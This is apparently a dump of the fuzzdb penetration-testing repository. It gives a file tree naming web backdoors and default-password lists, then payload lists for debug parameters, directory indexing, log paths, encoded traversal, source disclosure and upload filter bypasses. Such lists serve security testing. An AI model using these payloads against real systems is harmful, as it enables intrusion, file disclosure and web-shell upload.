├── frameset.htm │ │ │ ├── head.htm │ │ │ ├── htmltree.htm │ │ │ ├── linebreak.htm │ │ │ ├── lists.htm │ │ │ ├── misc.htm │ │ │ ├── multimedia.htm │ │ │ ├── obsolete.htm │ │ │ ├── positioning.htm │ │ │ ├── revisioning.htm │ │ │ ├── rubies.htm │ │ │ ├── stylesheet.htm │ │ │ ├── tables.htm │ │ │ └── text.htm │ ├── images │ │ ├── 0.gif │ │ ├── 1.gif │ │ ├── 2.gif │ │ ├── 3.gif │ │ ├── 4.gif │ │ ├── 5.gif │ │ ├── 6.gif │ │ ├── 7.gif │ │ ├── 8.gif │ │ ├── 9.gif │ │ ├── a.gif │ │ ├── analysis.gif │ │ ├── b.gif │ │ ├── branch.gif │ │ ├── c.gif │ │ ├── clear.gif │ │ ├── csstab.gif │ │ ├── d.gif │ │ ├── e.gif │ │ ├── f.gif │ │ ├── flat.gif │ │ ├── htmltab.gif │ │ ├── leaf.gif │ │ ├── minus.gif │ │ ├── paypallogo.gif │ │ ├── plus.gif │ │ ├── quote171.gif │ │ ├── quote187.gif │ │ ├── quote34.gif │ │ ├── quote39.gif │ │ ├── quote8216.gif │ │ ├── quote8217.gif │ │ ├── quote8220.gif │ │ ├── quote8221.gif │ │ ├── quote8222.gif │ │ ├── quote8249.gif │ │ ├── quote8250.gif │ │ ├── scrollbar-3dl-color.gif │ │ ├── scrollbar-arrow-color.gif │ │ ├── scrollbar-base-color.gif │ │ ├── scrollbar-default.gif │ │ ├── scrollbar-ds-color.gif │ │ ├── scrollbar-face-color.gif │ │ ├── scrollbar-highlight-color.gif │ │ ├── scrollbar-pieces.jpg │ │ ├── scrollbar-shadow-color.gif │ │ ├── scrollbar-track-color.gif │ │ ├── straight.gif │ │ ├── toolbarbl.jpg │ │ ├── toolbartop.jpg │ │ └── trans.gif │ ├── index.html │ ├── misc │ │ ├── copyright.htm │ │ ├── csscaveats.htm │ │ ├── discuss.htm │ │ ├── donate.htm │ │ ├── downloads.htm │ │ ├── email.htm │ │ ├── glossary.htm │ │ ├── how2read.htm │ │ ├── how2readcss.htm │ │ ├── htmlcaveats.htm │ │ ├── htmltopics.htm │ │ ├── license.htm │ │ ├── mirrors.htm │ │ ├── new.htm │ │ ├── sitewhy.htm │ │ ├── suppkey.htm │ │ ├── thanks.htm │ │ ├── topics.htm │ │ ├── versions.htm │ │ ├── whatfor.htm │ │ └── whichtags.htm │ ├── scripts │ │ ├── csschange.js │ │ └── search.js │ ├── setcss.htm │ ├── ss │ │ ├── 2.css │ │ ├── changecss.htm │ │ └── cssexplain.htm │ └── testing │ │ ├── blank.htm │ │ ├── html │ │ ├── scripts │ │ │ └── htmldomcss.js │ │ └── tags │ │ │ ├── a │ │ │ ├── abbr-bp1.htm │ │ │ ├── abbr-element-domcss.htm │ │ │ ├── abbr-element-render.htm │ │ │ ├── abbr-example.htm │ │ │ ├── acronym-element-domcss.htm │ │ │ ├── acronym-element-render.htm │ │ │ ├── acronym-example.htm │ │ │ ├── address-element-domcss.htm │ │ │ ├── address-element-render.htm │ │ │ ├── address-example.htm │ │ │ ├── ahref-bp1.htm │ │ │ ├── ahref-bp2.htm │ │ │ ├── ahref-bp3.htm │ │ │ ├── ahref-externalfragments1.htm │ │ │ ├── aname-bp1.htm │ │ │ ├── applet-bp1.htm │ │ │ ├── applet-bp2.htm │ │ │ ├── area-bp1.htm │ │ │ ├── area-bp2.htm │ │ │ ├── area-bp3.htm │ │ │ ├── area-bp4.htm │ │ │ └── arealocaltest.htm │ │ │ ├── b │ │ │ ├── b-element-domcss.htm │ │ │ ├── b-element-render.htm │ │ │ ├── b-example.htm │ │ │ ├── base-bp1.htm │ │ │ ├── base-bp2.htm │ │ │ ├── basefont-bp1.htm │ │ │ ├── basefont-bp2.htm │ │ │ ├── basefont-bp3.htm │ │ │ ├── basefont-bp4.htm │ │ │ ├── bdo-bp1.htm │ │ │ ├── big-bp1.htm │ │ │ ├── big-element-domcss.htm │ │ │ ├── big-element-render.htm │ │ │ ├── big-example.htm │ │ │ ├── blink-bp1.htm │ │ │ ├── blink-element-domcss.htm │ │ │ ├── blink-element-render.htm │ │ │ ├── blink-example.htm │ │ │ ├── blockquote-bp1.htm │ │ │ ├── blockquote-element-domcss.htm │ │ │ ├── blockquote-element-render.htm │ │ │ ├── blockquote-example.htm │ │ │ ├── body-bp1.htm │ │ │ ├── body-bp2.htm │ │ │ ├── body-bp3.htm │ │ │ ├── body-bp4.htm │ │ │ ├── body-bp5.htm │ │ │ ├── body-bp6.htm │ │ │ ├── br-bp1.htm │ │ │ ├── br-bp2.htm │ │ │ ├── br-bp3.htm │ │ │ ├── br-bp4.htm │ │ │ ├── br-bp5.htm │ │ │ ├── button-bp1.htm │ │ │ ├── button-bp2.htm │ │ │ ├── button-bp3.htm │ │ │ └── button-bp4.htm │ │ │ ├── c │ │ │ ├── caption-bp1.htm │ │ │ ├── caption-bp2.htm │ │ │ ├── caption-bp3.htm │ │ │ ├── center-bp1.htm │ │ │ ├── center-bp2.htm │ │ │ ├── center-element-domcss.htm │ │ │ ├── center-element-render.htm │ │ │ ├── center-example.htm │ │ │ ├── cite-element-domcss.htm │ │ │ ├── cite-element-render.htm │ │ │ ├── cite-example.htm │ │ │ ├── code-element-domcss.htm │ │ │ ├── code-element-render.htm │ │ │ └── code-example.htm │ │ │ ├── d │ │ │ ├── dd-element-domcss.htm │ │ │ ├── dd-element-render.htm │ │ │ ├── del-bp1.htm │ │ │ ├── del-bp2.htm │ │ │ ├── del-element-domcss.htm │ │ │ ├── del-element-render.htm │ │ │ ├── del-example.htm │ │ │ ├── dfn-element-domcss.htm │ │ │ ├── dfn-element-render.htm │ │ │ ├── dfn-example.htm │ │ │ ├── dir-bp1.htm │ │ │ ├── dir-bp2.htm │ │ │ ├── dir-element-domcss.htm │ │ │ ├── dir-element-render.htm │ │ │ ├── dir-example.htm │ │ │ ├── div-example.htm │ │ │ ├── dl-attribute-compact-render.htm │ │ │ ├── dl-element-domcss.htm │ │ │ ├── dl-element-render.htm │ │ │ ├── dl-example.htm │ │ │ ├── dt-element-domcss.htm │ │ │ ├── dt-element-render.htm │ │ │ ├── dtdd-bp1.htm │ │ │ └── dtdd-example.htm │ │ │ ├── e │ │ │ ├── em-element-domcss.htm │ │ │ ├── em-element-render.htm │ │ │ ├── em-example.htm │ │ │ ├── embed-bp1.htm │ │ │ ├── embedtest.htm │ │ │ └── embedtest.txt │ │ │ ├── f │ │ │ ├── fieldset-bp1.htm │ │ │ ├── fieldset-bp2.htm │ │ │ ├── font-bp1.htm │ │ │ ├── font-bp2.htm │ │ │ ├── font-element-render.htm │ │ │ ├── font-example.htm │ │ │ ├── frame-bp1.htm │ │ │ ├── frame-bp2.htm │ │ │ ├── frame-bp3.htm │ │ │ ├── frame-bp4.htm │ │ │ ├── framea.htm │ │ │ ├── frameb.htm │ │ │ ├── framec.htm │ │ │ ├── framed.htm │ │ │ ├── framee.htm │ │ │ ├── framef.htm │ │ │ ├── frameset-bp1.htm │ │ │ ├── frameset-bp2.htm │ │ │ ├── frameset-bp3.htm │ │ │ ├── frametest-recursivecols.htm │ │ │ ├── frametest-recursivecombo1.htm │ │ │ ├── frametest-recursivecombo2.htm │ │ │ ├── frametest-recursiverows.htm │ │ │ ├── frametest1.htm │ │ │ ├── frametest10.htm │ │ │ ├── frametest11.htm │ │ │ ├── frametest12.htm │ │ │ ├── frametest13.htm │ │ │ ├── frametest14.htm │ │ │ ├── frametest15.htm │ │ │ ├── frametest16.htm │ │ │ ├── frametest2.htm │ │ │ ├── frametest3.htm │ │ │ ├── frametest4.htm │ │ │ ├── frametest5.htm │ │ │ ├── frametest6.htm │ │ │ ├── frametest8.htm │ │ │ └── frametest9.htm │ │ │ ├── h │ │ │ ├── head-bp1.htm │ │ │ ├── heading-bp1.htm │ │ │ ├── heading-bp2.htm │ │ │ ├── hr-bp1.htm │ │ │ ├── hr-bp2.htm │ │ │ ├── hr-bp3.htm │ │ │ ├── hr-bp4.htm │ │ │ ├── hr-bp5.htm │ │ │ ├── html-bp1.htm │ │ │ └── html-bp2.htm │ │ │ ├── i │ │ │ ├── i-element-domcss.htm │ │ │ ├── i-element-render.htm │ │ │ ├── i-example.htm │ │ │ ├── iframe-bp1.htm │ │ │ ├── iframe-bp2.htm │ │ │ ├── iframetest.htm │ │ │ ├── ilayer-bp1.htm │ │ │ ├── img-bp1.htm │ │ │ ├── img-bp2.htm │ │ │ ├── img-bp3.htm │ │ │ ├── img-bp4.htm │ │ │ ├── img-bp5.htm │ │ │ ├── img-helper-lowsrc1.htm │ │ │ ├── inputbutton-bp2.htm │ │ │ ├── inputbutton-bp3.htm │ │ │ ├── inputbutton-bp4.htm │ │ │ ├── inputcheckbox-bp1.htm │ │ │ ├── inputcheckbox-bp2.htm │ │ │ ├── inputfile-bp1.htm │ │ │ ├── inputfile-bp2.htm │ │ │ ├── inputfile-bp3.htm │ │ │ ├── inputfile-bp4.htm │ │ │ ├── inputfile-bp5.htm │ │ │ ├── inputimage-bp1.htm │ │ │ ├── inputimage-bp2.htm │ │ │ ├── inputimage-bp3.htm │ │ │ ├── inputimage-bp4.htm │ │ │ ├── inputpassword-bp1.htm │ │ │ ├── inputpassword-bp2.htm │ │ │ ├── inputpassword-bp3.htm │ │ │ ├── inputradio-bp1.htm │ │ │ ├── inputreset-bp2.htm │ │ │ ├── inputreset-bp3.htm │ │ │ ├── inputreset-bp4.htm │ │ │ ├── inputreset-bp5.htm │ │ │ ├── inputsubmit-bp1.htm │ │ │ ├── inputsubmit-bp2.htm │ │ │ ├── inputsubmit-bp3.htm │ │ │ ├── inputsubmit-bp4.htm │ │ │ ├── inputsubmit-bp5.htm │ │ │ ├── inputtext-bp1.htm │ │ │ ├── inputtext-bp2.htm │ │ │ ├── inputtext-bp3.htm │ │ │ ├── ins-bp1.htm │ │ │ ├── ins-element-domcss.htm │ │ │ ├── ins-element-render.htm │ │ │ ├── ins-example.htm │ │ │ ├── isindex-bp1.htm │ │ │ ├── isindex-bp2.htm │ │ │ └── isindex-bp3.htm │ │ │ ├── k │ │ │ ├── kbd-element-domcss.htm │ │ │ ├── kbd-element-render.htm │ │ │ └── kbd-example.htm │ │ │ ├── l │ │ │ ├── layer-bp1.htm │ │ │ ├── layer-bp2.htm │ │ │ ├── layeraname1.htm │ │ │ ├── legend-bp1.htm │ │ │ ├── legend-bp2.htm │ │ │ ├── legend-bp3.htm │ │ │ ├── li-bp1.htm │ │ │ ├── li-bp2.htm │ │ │ ├── li-bp3.htm │ │ │ ├── link-bp1.htm │ │ │ ├── link-bp2.htm │ │ │ ├── link-bp3.htm │ │ │ ├── listing-bp1.htm │ │ │ └── listing-bp2.htm │ │ │ ├── m │ │ │ ├── map-bp1.htm │ │ │ ├── map-bp2.htm │ │ │ ├── marquee-bp1.htm │ │ │ ├── marquee-bp2.htm │ │ │ ├── marquee-bp3.htm │ │ │ ├── marquee-bp4.htm │ │ │ ├── marquee-bp5.htm │ │ │ ├── menu-bp1.htm │ │ │ ├── menu-bp2.htm │ │ │ ├── menu-bp3.htm │ │ │ ├── multicol-bp1.htm │ │ │ └── multicol-bp2.htm │ │ │ ├── n │ │ │ ├── nobr-element-domcss.htm │ │ │ ├── nobr-element-render.htm │ │ │ └── nobr-example.htm │ │ │ ├── o │ │ │ ├── ol-bp1.htm │ │ │ ├── ol-bp2.htm │ │ │ ├── ol-bp3.htm │ │ │ ├── optgroup-bp1.htm │ │ │ ├── option-bp1.htm │ │ │ └── option-bp2.htm │ │ │ ├── p │ │ │ ├── p-bp1.htm │ │ │ ├── plaintext-bp1.htm │ │ │ └── pre-bp1.htm │ │ │ ├── q │ │ │ ├── q-bp1.htm │ │ │ ├── q-bp2.htm │ │ │ └── q-bp3.htm │ │ │ ├── r │ │ │ ├── rp-bp1.htm │ │ │ ├── rt-bp1.htm │ │ │ ├── rt-bp2.htm │ │ │ ├── rtc-bp1.htm │ │ │ ├── ruby-bp1.htm │ │ │ ├── ruby-bp2.htm │ │ │ ├── ruby-bp3.htm │ │ │ ├── ruby-bp4.htm │ │ │ └── ruby-bp5.htm │ │ │ ├── s │ │ │ ├── s-element-domcss.htm │ │ │ ├── s-element-render.htm │ │ │ ├── s-example.htm │ │ │ ├── samp-element-domcss.htm │ │ │ ├── samp-element-render.htm │ │ │ ├── samp-example.htm │ │ │ ├── script-bp1.htm │ │ │ ├── select-bp1.htm │ │ │ ├── select-bp2.htm │ │ │ ├── select-bp3.htm │ │ │ ├── select-bp4.htm │ │ │ ├── select-bp5.htm │ │ │ ├── small-bp1.htm │ │ │ ├── small-element-domcss.htm │ │ │ ├── small-element-render.htm │ │ │ ├── small-example.htm │ │ │ ├── span-element-domcss.htm │ │ │ ├── span-element-render.htm │ │ │ ├── span-example.htm │ │ │ ├── strike-element-domcss.htm │ │ │ ├── strike-element-render.htm │ │ │ ├── strike-example.htm │ │ │ ├── strong-element-domcss.htm │ │ │ ├── strong-element-render.htm │ │ │ ├── strong-example.htm │ │ │ ├── style-bp1.htm │ │ │ ├── style-bp2.htm │ │ │ ├── style-bp3.htm │ │ │ ├── style-bp4.htm │ │ │ ├── sub-element-domcss.htm │ │ │ ├── sub-element-render.htm │ │ │ ├── sub-example.htm │ │ │ ├── sup-bp1.htm │ │ │ ├── sup-element-domcss.htm │ │ │ ├── sup-element-render.htm │ │ │ └── sup-example.htm │ │ │ ├── t │ │ │ ├── table-bp1.htm │ │ │ ├── table-bp2.htm │ │ │ ├── table-bp3.htm │ │ │ ├── table-bp4.htm │ │ │ ├── table-bp5.htm │ │ │ ├── table-bp6.htm │ │ │ ├── table-bp7.htm │ │ │ ├── tbody-bp1.htm │ │ │ ├── textarea-bp1.htm │ │ │ ├── textarea-bp2.htm │ │ │ ├── textarea-bp3.htm │ │ │ ├── textarea-bp4.htm │ │ │ ├── thead-bp1.htm │ │ │ ├── thead-bp2.htm │ │ │ ├── thead-bp3.htm │ │ │ ├── thead-bp4.htm │ │ │ ├── thtd-bp1.htm │ │ │ ├── thtd-bp2.htm │ │ │ ├── title-bp1.htm │ │ │ ├── title-bp2.htm │ │ │ ├── title-bp3.htm │ │ │ ├── tr-bp1.htm │ │ │ ├── tt-element-domcss.htm │ │ │ ├── tt-element-render.htm │ │ │ └── tt-example.htm │ │ │ ├── u │ │ │ ├── u-bp1.htm │ │ │ ├── u-element-domcss.htm │ │ │ ├── u-element-render.htm │ │ │ ├── u-example.htm │ │ │ ├── ul-bp1.htm │ │ │ └── ul-bp2.htm │ │ │ ├── v │ │ │ ├── var-element-domcss.htm │ │ │ ├── var-element-render.htm │ │ │ └── var-example.htm │ │ │ └── x │ │ │ ├── xmp-bp1.htm │ │ │ ├── xmp-element-domcss.htm │ │ │ ├── xmp-element-render.htm │ │ │ └── xmp-example.htm │ │ ├── htmltester.htm │ │ └── objects │ │ ├── crosshair.gif │ │ ├── css │ │ ├── mediaall.css │ │ ├── mediaaural.css │ │ ├── mediabraille.css │ │ ├── mediaembossed.css │ │ ├── mediahandheld.css │ │ ├── mediaprint.css │ │ ├── mediaprojection.css │ │ ├── mediascreen.css │ │ ├── mediaspeech.css │ │ ├── mediatty.css │ │ └── mediatv.css │ │ ├── imagemap-bluelink.gif │ │ ├── imagemap-defaultlink.gif │ │ ├── imagemap-greenlink.gif │ │ ├── imagemap-orangelink.gif │ │ ├── imagemap-yellowlink.gif │ │ ├── imagemapring.gif │ │ ├── imagemaptest.gif │ │ ├── images │ │ ├── animeyes.gif │ │ ├── centeringgrid.png │ │ ├── left.gif │ │ ├── overlap.gif │ │ ├── right.gif │ │ ├── tilepattern.gif │ │ ├── wrench.gif │ │ └── zenpattern.gif │ │ └── urlbutton.class │ ├── htmlcodes.htm │ ├── netcat_cheat_sheet_v1.pdf │ └── windows_command_line_sheet_v1.pdf ├── index.html ├── regex ├── errors.txt ├── nsa-wordlist.txt ├── pii.fuzz.txt ├── pii.readme.txt ├── readme.txt └── sessionid.txt ├── web-backdoors ├── asp │ ├── cmd-asp-5.1.asp │ ├── cmd.asp │ ├── cmd.aspx │ ├── cmdasp.asp │ ├── cmdasp.aspx │ ├── list.asp │ ├── list.txt │ ├── ntdaddy.asp │ └── up.asp ├── c │ └── cmd.c ├── cfm │ ├── cfExec.cfm │ ├── cfSQL.cfm │ └── cmd.cfm ├── exe │ └── nc.exe ├── jsp │ ├── CmdServlet.class │ ├── CmdServlet.java │ ├── ListServlet.class │ ├── ListServlet.java │ ├── UpServlet.class │ ├── UpServlet.java │ ├── browser.jsp │ ├── cmd.jsp │ ├── cmdjsp.jsp │ ├── jsp-reverse.jsp │ ├── list.jsp │ ├── up.jsp │ └── win32 │ │ ├── cmd_win32.jsp │ │ └── up_win32.jsp ├── php │ ├── cmd.php │ ├── list.php │ ├── php-backdoor.php │ ├── simple-backdoor.php │ └── up.php ├── pl-cgi │ ├── cmd.pl │ ├── list.pl │ ├── perlcmd.cgi │ └── up.pl ├── servlet │ ├── CmdServlet.java │ ├── ListServlet.java │ └── UpServlet.java └── sh │ ├── cmd.sh │ ├── list.sh │ └── up.sh ├── wordlists-misc ├── common-http-ports.txt ├── us_cities.txt ├── wordlist-alphanumeric-case.txt ├── wordlist-common-snmp-community-strings.txt └── wordlist-dna.txt └── wordlists-user-passwd ├── db2 ├── db2_default_pass.txt ├── db2_default_user.txt └── db2_default_userpass.txt ├── faithwriters.txt ├── generic-listpairs ├── http_default_pass.txt ├── http_default_userpass.txt └── http_default_users.txt ├── names └── namelist.txt ├── oracle ├── _hci_oracle_passwords.txt └── _oracle_default_passwords.txt ├── passwds ├── john.txt ├── phpbb.txt ├── twitter.txt └── weaksauce.txt ├── postgres ├── postgres_default_pass.txt ├── postgres_default_user.txt └── postgres_default_userpass.txt ├── readme.txt ├── tomcat ├── tomcat_mgr_default_pass.txt ├── tomcat_mgr_default_userpass.txt └── tomcat_mgr_default_users.txt └── unix-os ├── unix_passwords.txt └── unix_users.txt /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-cayman -------------------------------------------------------------------------------- /attack-payloads/BizLogic/CommonMethods.fuzz.txt: -------------------------------------------------------------------------------- 1 | get 2 | put 3 | send 4 | delete 5 | remove 6 | create 7 | add 8 | move 9 | show 10 | list 11 | query 12 | search 13 | view 14 | open 15 | show 16 | download 17 | edit 18 | change 19 | alter 20 | modify 21 | test 22 | update 23 | save 24 | load 25 | close 26 | make 27 | upload 28 | rename 29 | reset 30 | cancel 31 | admin 32 | demo 33 | verify 34 | vrfy 35 | on 36 | off 37 | 0 38 | 1 39 | enable 40 | disable 41 | -------------------------------------------------------------------------------- /attack-payloads/BizLogic/DebugParams.fuzz.txt: -------------------------------------------------------------------------------- 1 | 7357=1 2 | 7357=true 3 | 7357=y 4 | 7357=yes 5 | access=1 6 | access=true 7 | access=y 8 | access=yes 9 | adm=1 10 | adm1n=1 11 | adm1n=true 12 | adm1n=y 13 | adm1n=yes 14 | admin=1 15 | admin=true 16 | admin=y 17 | admin=yes 18 | adm=true 19 | adm=y 20 | adm=yes 21 | dbg=1 22 | dbg=true 23 | dbg=y 24 | dbg=yes 25 | debug=1 26 | debug=true 27 | debug=y 28 | debug=yes 29 | edit=1 30 | edit=true 31 | edit=y 32 | edit=yes 33 | grant=1 34 | grant=true 35 | grant=y 36 | grant=yes 37 | test=1 38 | test=true 39 | test=y 40 | test=yes 41 | -------------------------------------------------------------------------------- /attack-payloads/disclosure-directory/directory-indexing-generic.fuzz.txt: -------------------------------------------------------------------------------- 1 | /%3f.jsp 2 | /?M=D 3 | /?S=D 4 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 5 | /cgi-bin/test-cgi?/* 6 | /cgi-bin/test-cgi?* 7 | /%00/ 8 | /%2e/ 9 | /%2f/ 10 | /%5c/ 11 | -------------------------------------------------------------------------------- /attack-payloads/disclosure-directory/source-directory-file-indexing-cheatsheet.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/attack-payloads/disclosure-directory/source-directory-file-indexing-cheatsheet.html -------------------------------------------------------------------------------- /attack-payloads/disclosure-localpaths/unix/common-unix-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | # based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf 2 | /apache/logs/error.log 3 | /apache/logs/access.log 4 | /apache/logs/error.log 5 | /apache/logs/access.log 6 | /apache/logs/error.log 7 | /apache/logs/access.log 8 | /etc/httpd/logs/acces_log 9 | /etc/httpd/logs/acces.log 10 | /etc/httpd/logs/error_log 11 | /etc/httpd/logs/error.log 12 | /var/www/logs/access_log 13 | /var/www/logs/access.log 14 | /usr/local/apache/logs/access_log 15 | /usr/local/apache/logs/access.log 16 | /var/log/apache/access_log 17 | /var/log/apache2/access_log 18 | /var/log/apache/access.log 19 | /var/log/apache2/access.log 20 | /var/log/access_log 21 | /var/log/access.log 22 | /var/www/logs/error_log 23 | /var/www/logs/error.log 24 | /usr/local/apache/logs/error_log 25 | /usr/local/apache/logs/error.log 26 | /var/log/apache/error_log 27 | /var/log/apache2/error_log 28 | /var/log/apache/error.log 29 | /var/log/apache2/error.log 30 | /var/log/error_log 31 | /var/log/error.log 32 | -------------------------------------------------------------------------------- /attack-payloads/disclosure-source/source-disc-cmd-exec-traversal.txt: -------------------------------------------------------------------------------- 1 | # single directory traversals that have caused showcode or command exec issues in the past 2 | # GET /path/*payload*relative/path/to/target/file/ 3 | ..%255c 4 | .%5c../..%5c 5 | /..%c0%9v../ 6 | /..%c0%af../ 7 | /..%255c..%255c 8 | 9 | -------------------------------------------------------------------------------- /attack-payloads/disclosure-source/source-disclosure-generic.txt: -------------------------------------------------------------------------------- 1 | # known cross platform source Code, file disclosure attack patterns - append after file or dir path 2 | %70 3 | .%E2%73%70 4 | %2e0 5 | %2e 6 | . 7 | \ 8 | ?* 9 | %20 10 | %00 11 | %2f 12 | %5c 13 | -------------------------------------------------------------------------------- /attack-payloads/disclosure-source/source-disclosure-microsoft.txt: -------------------------------------------------------------------------------- 1 | # microsoft-specific appends - try the generic list, too 2 | +.htr 3 | ::DATA$ 4 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/alt-extensions-asp.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | asa 4 | aSP 5 | aSpx 6 | aSa 7 | asp%20%20%20 8 | aspx%20%20%20 9 | asa%20%20%20 10 | aSP%20%20%20 11 | aSpx%20%20%20 12 | aSa%20%20%20 13 | asp...... 14 | aspx...... 15 | asa...... 16 | aSP...... 17 | aSpx...... 18 | aSa...... 19 | asp%20%20%20...%20.%20.. 20 | aspx%20%20%20...%20.%20.. 21 | asa%20%20%20...%20.%20.. 22 | aSP%20%20%20...%20.%20.. 23 | aSpx%20%20%20...%20.%20.. 24 | aSa%20%20%20...%20.%20.. 25 | asp%00 26 | aspx%00 27 | asa%00 28 | aSp%00 29 | aSpx%00 30 | aSa%00 31 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/alt-extensions-coldfusion.txt: -------------------------------------------------------------------------------- 1 | cfm 2 | cfml 3 | cfc 4 | dbm 5 | cFm 6 | cFml 7 | cFc 8 | dBm 9 | cfm%20%20%20 10 | cfml%20%20%20 11 | cfc%20%20%20 12 | dbm%20%20%20 13 | cFm%20%20%20 14 | cFml%20%20%20 15 | cFc%20%20%20 16 | dBm%20%20%20 17 | cfm...... 18 | cfml...... 19 | cfc....... 20 | dbm...... 21 | cFm...... 22 | cFml...... 23 | cFc...... 24 | dBm...... 25 | cfm%20%20%20...%20.%20.. 26 | cfml%20%20%20...%20.%20.. 27 | cfc%20%20%20...%20.%20.. 28 | dbm%20%20%20...%20.%20.. 29 | cFm%20%20%20...%20.%20.. 30 | cFml%20%20%20...%20.%20.. 31 | cFc%20%20%20...%20.%20.. 32 | dBm%20%20%20...%20.%20.. 33 | cfm%00 34 | cfml%00 35 | cfc%00 36 | dbm%00 37 | cFm%00 38 | cFml%00 39 | cFc%00 40 | dBm%00 41 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/alt-extensions-jsp.txt: -------------------------------------------------------------------------------- 1 | jsp 2 | jspx 3 | jsw 4 | jsv 5 | jspf 6 | jSp 7 | jSpx 8 | jSw 9 | jSv 10 | jSpf 11 | jSp%00 12 | jSp%20%20%20 13 | jSp%20%20%20...%20.%20..a 14 | jSp...... 15 | jSpf%00 16 | jSpf%20%20%20 17 | jSpf%20%20%20...%20.%20..a 18 | jSpf...... 19 | jSpx%00 20 | jSpx%20%20%20 21 | jSpx%20%20%20...%20.%20..a 22 | jSpx...... 23 | jSv%00 24 | jSv%20%20%20 25 | jSv%20%20%20...%20.%20..a 26 | jSv...... 27 | jSw%00 28 | jSw%20%20%20 29 | jSw%20%20%20...%20.%20..a 30 | jSw...... 31 | jsp%00 32 | jsp%20%20%20 33 | jsp%20%20%20...%20.%20..a 34 | jsp...... 35 | jspf%00 36 | jspf%20%20%20 37 | jspf%20%20%20...%20.%20..a 38 | jspf...... 39 | jspx%00 40 | jspx%20%20%20 41 | jspx%20%20%20...%20.%20..a 42 | jspx...... 43 | jsv%00 44 | jsv%20%20%20 45 | jsv%20%20%20...%20.%20..a 46 | jsv...... 47 | jsw%00 48 | jsw%20%20%20 49 | jsw%20%20%20...%20.%20..a 50 | jsw...... 51 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/alt-extensions-perl.txt: -------------------------------------------------------------------------------- 1 | # .pm .lib cannot be called directly, must be called as modules 2 | pl 3 | pm 4 | cgi 5 | pL 6 | pM 7 | cGi 8 | lib 9 | lIb 10 | cGi%00 11 | cGi%20%20%20 12 | cGi...... 13 | cgi%00 14 | cgi%20%20%20 15 | cgi...... 16 | lIb%00 17 | lIb%20%20%20 18 | lIb...... 19 | lib%00 20 | lib%20%20%20 21 | lib...... 22 | pL%00 23 | pL%20%20%20 24 | pL...... 25 | pM%00 26 | pM%20%20%20 27 | pM...... 28 | pl%00 29 | pl%20%20%20 30 | pl...... 31 | pm%00 32 | pm%20%20%20 33 | pm...... 34 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/alt-extensions-php.txt: -------------------------------------------------------------------------------- 1 | phtml 2 | php 3 | php3 4 | php4 5 | php5 6 | inc 7 | pHtml 8 | pHp 9 | pHp3 10 | pHp4 11 | pHp5 12 | iNc 13 | iNc%00 14 | iNc%20%20%20 15 | iNc%20%20%20...%20.%20.. 16 | iNc...... 17 | inc%00 18 | inc%20%20%20 19 | inc%20%20%20...%20.%20.. 20 | inc...... 21 | pHp%00 22 | pHp%20%20%20 23 | pHp%20%20%20...%20.%20.. 24 | pHp...... 25 | pHp3%00 26 | pHp3%20%20%20 27 | pHp3%20%20%20...%20.%20.. 28 | pHp3...... 29 | pHp4%00 30 | pHp4%20%20%20 31 | pHp4%20%20%20...%20.%20.. 32 | pHp4...... 33 | pHp5%00 34 | pHp5%20%20%20 35 | pHp5%20%20%20...%20.%20.. 36 | pHp5...... 37 | pHtml%00 38 | pHtml%20%20%20 39 | pHtml%20%20%20...%20.%20.. 40 | pHtml...... 41 | php%00 42 | php%20%20%20 43 | php%20%20%20...%20.%20.. 44 | php...... 45 | php3%00 46 | php3%20%20%20 47 | php3%20%20%20...%20.%20.. 48 | php3...... 49 | php4%00 50 | php4%20%20%20 51 | php4%20%20%20...%20.%20.. 52 | php4...... 53 | php5%00 54 | php5%20%20%20 55 | php5%20%20%20...%20.%20.. 56 | php5...... 57 | phtml%00 58 | phtml%20%20%20 59 | phtml%20%20%20...%20.%20.. 60 | phtml...... 61 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt: -------------------------------------------------------------------------------- 1 | templates_compiled 2 | templates_c 3 | templates 4 | temporary 5 | images 6 | cache 7 | temp 8 | files 9 | tmp 10 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt: -------------------------------------------------------------------------------- 1 | # {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed. 2 | {ASPSCRIPT} 3 | {ASPSCRIPT}.{EXT} 4 | {ASPSCRIPT}; 5 | {ASPSCRIPT};.{EXT} 6 | {ASPSCRIPT}%00 7 | {ASPSCRIPT}%00.{EXT} 8 | {ASPSCRIPT}::data%00. 9 | {ASPSCRIPT}::data%00.{EXT} 10 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/file-ul-filter-bypass-ms-php.txt: -------------------------------------------------------------------------------- 1 | # Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to: 2 | # ----- 3 | # 4 | #----- 5 | {PHPSCRIPT} 6 | {PHPSCRIPT}.phtml 7 | {PHPSCRIPT}.php.html 8 | {PHPSCRIPT}.php::$DATA 9 | {PHPSCRIPT}.php.php.rar 10 | {PHPSCRIPT}.php.rar 11 | {PHPSCRIPT}::$DATA 12 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/file-ul-filter-bypass-x-platform-generic.txt: -------------------------------------------------------------------------------- 1 | %00index.html 2 | ;index.html 3 | %00 4 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/file-ul-filter-bypass-x-platform-php.txt: -------------------------------------------------------------------------------- 1 | # Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to: 2 | # ----- 3 | # your own payload, or 4 | #----- 5 | {PHPSCRIPT} 6 | {PHPSCRIPT}.phtml 7 | {PHPSCRIPT}.php.html 8 | 